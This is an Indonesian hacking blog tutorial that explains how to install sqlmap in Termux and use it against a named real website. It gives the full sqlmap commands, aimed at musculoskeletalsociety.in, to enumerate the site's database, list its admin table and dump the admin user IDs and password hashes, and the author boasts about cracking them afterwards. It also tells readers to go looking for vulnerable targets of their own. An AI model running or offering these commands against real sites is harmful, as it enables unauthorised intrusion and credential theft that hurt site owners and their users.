draxploit.web.id - Cara install Sqlmap 2020 beserta cara mengexploitasi website target
 |
| SQLMAP LOGO TERMINAL |
Hai Exploiters pada kesempatan kali ini saya Mr.Stay24Hacker's disini saya akan membagikan bagaimana cara menggunakan sqlmap dengan benar, serta mengajarkan bagaimana mengexploitasi suatu website yang rentan terhadap sql injection ( bug sql injection ). mungkin diantara kalian yang membaca artikel kali ini sudah mengetahui apa itu Sql injection.
Sql injection adalah bug yang sering di temukan di website website tertentu, bug ini tercipta karna kesalahan admin. biasanya kesalahan yang muncul saat kita mencoba mengexploitasi bug sql injection ini adalah seperti gambar dibawah ini.
 |
| Error Sql Syntax |
Diatas adalah contoh website yang vuln terhadap sql injection, Biasanya para attacker ( hackers ) akan memanfaatkan bug sql injection tersebut dengan cara menyuntikan code SQL untuk mendapatkan database suatu website, karna biasanya di dalam suatu database website itu ada hal hal yang penting seperti Account,Credit Card,User admin,Password Admin,Dll.
Untuk melakukan exploitasi terhadap bug SQL INJECTION ini ada beberapa macam, yang biasanya dipake oleh para attacker yaitu :
1. Meng Exploitasi Secara Manual
2. Meng Exploitasi Secara Automatis ( Menggunakan Tools )
Yang saya tau biasanya para attacker menggunakan cara yang pertama (1) untuk mendapatkan database di suatu website. Nah disini saya akan memberikan tutorialnya bagaimana Meng Exploitasi bug SQL INJECTION secara automatis ( Auto Inject ) Menggunakan Sqlmap.
Bahan bahan yang kalian perlukan untuk melakukan Exploitasi Bug Sql Injection secara automatis atau menggunakan sqlmap adalah
- Terminal ( Termux/Kali Linux/Dll )
- Kuota Yang Cukup.
- Tools Sqlmap
*Tools Sqlmap kalian bisa mendapatkanya di github. Disini saya akan memberikan contoh penginstallan SQLMAP ( SQL MAPPER ).
1. Buka Terminal Untuk Penginstallan Tools
 |
| Terminal Termux |
Disini saya menggunakan termux untuk instalasi SQLMAP TOOLS, Kalian bisa menggunakan terminal selain Termux.
2. Masukan Command-Command Untuk Menginstall Bahanya
 |
| Gambar hanya pemanis |
Jika sudah berada di terminal silahkan kalian ketikan comand-comand dibawah ini supaya tidak ada eror saat melakukan Exploitasi.
#Comand Installasi
*Karna disini saya memakai termux kemungkinan besar saat menginstall akan sedikit berbeda jika kalian menggunakan terminal lain.
$ pkg update && pkg upgrade
$ pkg install git
$ pkg install python2
$ pip2 install requests
$ pip2 install mechanize
$ pip2 install bs4
*diatas adalah command yang harus kalian ketik. Jika semua module diatas sudah kalian install, lanjut ke installasi toolsnya, diatas adalah bahan bahan tools alias keperluan nah sekarang kita install tools nya. Tanda $ ( dollar ) tidak usah di tulis.
Masukan command seperti ini di terminal kalian masing masing
 |
| Git clone |
Kita clone link url tersebut, link diatas adalah tools sqlmap yang akan kita jalankan nanti. Jika kalian sudah berhasil menginstallnya lanjutkan ke tahap selanjutnya.
3. Jalankan Tools Sqlmap
 |
| SQLMAP LOGO TERMINAL |
Saat kalian sudah selesai mengclone link tadi selanjutnya kalian ketikan comand ( ls ).
 |
| TOOLS SQLMAP |
Sudah kalian lakukan? Ada toolsnya?, lanjut kita masukan command ini
$ cd sqlmap
$ python2 sqlmap.py
*Tanda $ ( dollar ) tidak usah di tulis.
 |
| Setelah menjalankan command |
Setelah menjalankan kedua command di atas kalian akan mendapatkan tampilan Logo SQLMAP dan juga command command untuk melakukan exploitasi terhadap website yang rentan terhadap sql injection.
Mari kita ke tahap peng exploitasi nya. Disini saya mencontohkan bagaimana cara melakukan exploitasi kepada website target agar bisa mendapatkan database dari website tersebut, karna ini hanya mencontohkan jadi saya hanya akan memberikan trick dasarnya saja untuk kalian coba dalam melakukan exploitasi terhadap website target, untuk mendapatkan database website tersebut tentunya.
4. Meng exploitasi target
Baiklah sekarang kita masuk ke terminal kembali, kalian cari target yang vuln terhadap serangan sql injection.
 |
| Comand Exploit Target |
Kalian ketikan comand seperti diatas, jangan lupa juga url target dan parameter yang vuln terhadap sql injection lalu tekan enter.
 |
| Tools Berjalan |
Setelah kalian meng enter comand tersebut lalu kalian akan mendapatkan tampilan seperti ini yang berarti tools tersebut berhasil dijalankan. Sekarang kita tinggal menunggu tools mendapatkan database dari website target tersebut lalu kita akan dump database web tersebut.
 |
| Database website muncul |
available databases [2]:
[*] culosmus_muscul
[*] information_schema
sekarang mari kita lihat ada apa saja didalam database website tersebut, untuk melihat apa isi didalam database website kita masukan comand dibawah ini.
 |
| Melihat Isi Database |
*kalian masukan nama database website di depan -D seperti diatas contohnya.
 |
| Isi database |
Bisa dilihat ada bermacam macam isi didalam database website tersebut disini saya akan mencoba melihat isi dari table admin mungkin disana ada hal yang bisa kita dapatkan hhe.
$ python2 sqlmap.py -u http://musculoskeletalsociety.in/page.php?id=5 -D culosmus_muscul -T admin --columns
Diatas adalah comand untuk melihat colums yang ada di tables admin, kita harus mengetahui columnya terlebih dahulu untuk melakukan dump kepada database target.
 |
| Isi dari table admin |
Sudah mendapatkanya? Mari kita coba dump column tersebut disini saya akan men dump user_id dan password admin.
$ python2 sqlmap.py -u http://musculoskeletalsociety.in/page.php?id=5 -D culosmus_muscul -T admin -C user_id,password --dump
 |
| Isi dari colums admin |
Dan setelah saya memasukan command diatas dan BOOM!, saya berhasil mendapatkan username dan password admin, Password dalam keadaan ter hash. Tapi tidak masalah kita bisa mencrack password tersebut hhe.
Jika kalian ingin melihat lihat database yang lainya kalian bisa kembali memakai command ini untuk melihat isi database lainya ( table )
$ python2 sqlmap.py -u http://musculoskeletalsociety.in/page.php?id=5 -D culosmus_muscul --tables
 |
| Kembali ke awal |
Nah kembali ke awal kan kita tadi dump admin, kalian bisa dump table yang lainya...
Oke mungkin cukup sekian untuk artikel kali ini semoga bermanfaat untuk kalian semua, Say good by. Assalamualaikum.
-Mr.Stay24Hacker's
